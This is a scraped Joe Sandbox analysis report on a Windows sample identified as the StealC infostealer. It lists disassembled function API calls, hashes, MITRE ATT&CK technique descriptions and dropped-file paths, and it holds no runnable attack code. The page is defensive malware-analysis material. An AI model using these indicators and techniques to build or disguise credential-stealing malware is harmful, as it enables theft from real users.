Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4

Function 00401410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593

lstrcpy.KERNEL32(00000000,?), ref: 00401437
lstrcpy.KERNEL32(00000000,?), ref: 00401459
lstrcpy.KERNEL32(00000000,?), ref: 0040147B
lstrcpy.KERNEL32(00000000,?), ref: 004014DF

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94

Function 024E1677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000), ref: 024E1794
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17B6
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17D8
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17FA

lstrcpy.KERNEL32(00000000,?), ref: 024E169E
lstrcpy.KERNEL32(00000000,?), ref: 024E16C0
lstrcpy.KERNEL32(00000000,?), ref: 024E16E2
lstrcpy.KERNEL32(00000000,?), ref: 024E1746

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction ID: 05e9e47e69a7fe543ef7c57d1cdb007cc23b807f1605f6700520dbf1904c4470
Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction Fuzzy Hash: 0231BAB4A51B42AFEB24DF3AC584957B7E5BF48706704492E989AC3B10D774F810CF90

Function 024E1673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000), ref: 024E1794
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17B6
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17D8
Part of subcall function 024E1777: lstrcpy.KERNEL32(00000000,?), ref: 024E17FA

lstrcpy.KERNEL32(00000000,?), ref: 024E169E
lstrcpy.KERNEL32(00000000,?), ref: 024E16C0
lstrcpy.KERNEL32(00000000,?), ref: 024E16E2
lstrcpy.KERNEL32(00000000,?), ref: 024E1746

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction ID: f46e945dd9ae83ed24a07ef96a78440e940fcb9f2dc7726682fea598967167ba
Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction Fuzzy Hash: 2E31BAB4A51B42AFEB24DF3AC984957B7E5BF48706704492E989AC3B10D774F810CF90

Function 025017B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 025017E8
lstrcpy.KERNEL32(00000000,?), ref: 02501820
lstrcpy.KERNEL32(00000000,?), ref: 02501858
lstrcpy.KERNEL32(00000000,?), ref: 02501890

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction ID: dbacb7b5513e0ae16851159276c4bbb9e77573d472c0a41ceb14c93d6ba914aa
Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction Fuzzy Hash: 6821FAB4601B029BEB34DF36C994A16BBE9BF44315B14891DD89AC7A80EB74F400CFA5

Function 024FC39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 025040AC
Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 025040D6
Part of subcall function 02504077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,024E1495,?,0000001A), ref: 025040E0

lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5B2
lstrcat.KERNEL32(00000000), ref: 024FC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FC629

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction ID: 29884756ef2af2d0667c80672a30d0b0fd599bdddd7778b1f049f2167c83b606
Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction Fuzzy Hash: DB218B70E002599FDF10EFB4CCC8AAEB7B6AF84309F18546AD501AB251EB74D941DF90

Function 00406E32 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID:
API String ID: 1643994569-0
Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95

Function 00401510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 0040152D
lstrcpy.KERNEL32(00000000,?), ref: 0040154F
lstrcpy.KERNEL32(00000000,?), ref: 00401571
lstrcpy.KERNEL32(00000000,?), ref: 00401593

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94

Function 024E1777 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 024E1794
lstrcpy.KERNEL32(00000000,?), ref: 024E17B6
lstrcpy.KERNEL32(00000000,?), ref: 024E17D8
lstrcpy.KERNEL32(00000000,?), ref: 024E17FA

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction ID: 55575ba2c69fb6eb8d238801796dd6491cbe9522fa8ef06dac98c565fffa0e46
Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction Fuzzy Hash: 2711D074651B025BEB249F36D858927B7EABF44646704452E989BC3B40EB74E801CF60

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EbXj93v3bO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BB02.tmp.exe_9d4a573d3a22a33f4c9225399e56b8395f345f_5a9a713c_1ff52202-34fd-420e-944f-407920dd89a7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER123.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER23E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
EbXj93v3bO.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0251003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre